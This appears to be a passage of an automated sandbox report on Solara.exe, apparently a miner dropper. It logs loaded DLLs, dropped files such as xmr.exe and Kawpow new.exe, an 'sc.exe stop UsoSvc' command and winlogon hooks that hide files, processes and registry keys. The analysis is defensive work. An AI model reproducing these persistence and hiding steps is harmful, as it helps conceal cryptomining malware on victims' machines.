Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\Solara.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Solara.exeStatic file information: File size 22179840 > 1048576
Source: Solara.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x14e4000
Source: SolaraBootstrapper.exe.10.drStatic PE information: 0x9EA529E4 [Tue May 5 20:04:52 2054 UTC]
Source: eth.exe.0.drStatic PE information: section name: .00cfg
Source: xmr.exe.0.drStatic PE information: section name: .00cfg
Source: lrgkmixyjzta.exe.7.drStatic PE information: section name: .00cfg
Source: Kawpow new.exe.13.drStatic PE information: section name: .00cfg
Source: xmr new.exe.13.drStatic PE information: section name: .00cfg
Source: eejhedztifcv.exe.22.drStatic PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BF6338 pushad ; ret 1_2_04BF6341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BF0CF0 push eax; ret 1_2_04BF0CFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BF0CE0 push eax; ret 1_2_04BF0CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BF0CD0 push eax; ret 1_2_04BF0CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04BF6F1A pushad ; ret 1_2_04BF6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE6358 pushad ; ret 11_2_04EE6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE0CE0 push eax; ret 11_2_04EE0CEA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE0CF0 push eax; ret 11_2_04EE0CFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE0CD0 push eax; ret 11_2_04EE0CDA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE0C90 push eax; ret 11_2_04EE0CCA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_04EE6F10 pushad ; ret 11_2_04EE6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08F1841A pushad ; ret 11_2_08F1841B
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_02700677 push eax; ret 15_2_0270067A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_02700669 push eax; ret 15_2_0270066A
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_027006F0 push eax; ret 15_2_027006FA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_027006E0 push eax; ret 15_2_027006EA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_027006D0 push eax; ret 15_2_027006DA
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeCode function: 15_2_027006B0 push eax; ret 15_2_027006CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A42A8 push ebx; ret 17_2_049A42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A638D pushad ; ret 17_2_049A6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A0F90 push eax; ret 17_2_049A0F9A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A0F80 push eax; ret 17_2_049A0F8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A0FA0 push eax; ret 17_2_049A0FAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A6F1C pushad ; ret 17_2_049A6F23
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049A0F64 push eax; ret 17_2_049A0F7A
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8233ACDD push rcx; retf 003Fh19_2_0000027E8233ACDE
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeCode function: 19_2_0000027E8248C6DD push rcx; retf 003Fh19_2_0000027E8248C6DE
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A4ACDD push rcx; retf 003Fh22_2_0000012C42A4ACDE
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeCode function: 22_2_0000012C42A9C6DD push rcx; retf 003Fh22_2_0000012C42A9C6DE
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E85899ACDD push rcx; retf 003Fh66_2_000001E85899ACDE
Source: C:\Windows\System32\winlogon.exeCode function: 66_2_000001E8589CC6DD push rcx; retf 003Fh66_2_000001E8589CC6DE
Source: C:\Users\user\AppData\Local\Temp\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\xmr new.exeJump to dropped file
Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeJump to dropped file
Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\eth.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exeFile created: C:\Users\user\AppData\Local\Temp\kx new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kx new.exeFile created: C:\Users\user\AppData\Local\Temp\Kawpow new.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr.exeFile created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeJump to dropped file
Source: C:\Users\user\Desktop\Solara.exeFile created: C:\Users\user\AppData\Local\Temp\xmr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeFile created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr.exeFile created: C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\xmr.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

barindex
Hooks files or directories query functions (used to hide files and directories)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Loading BitLocker PowerShell Module
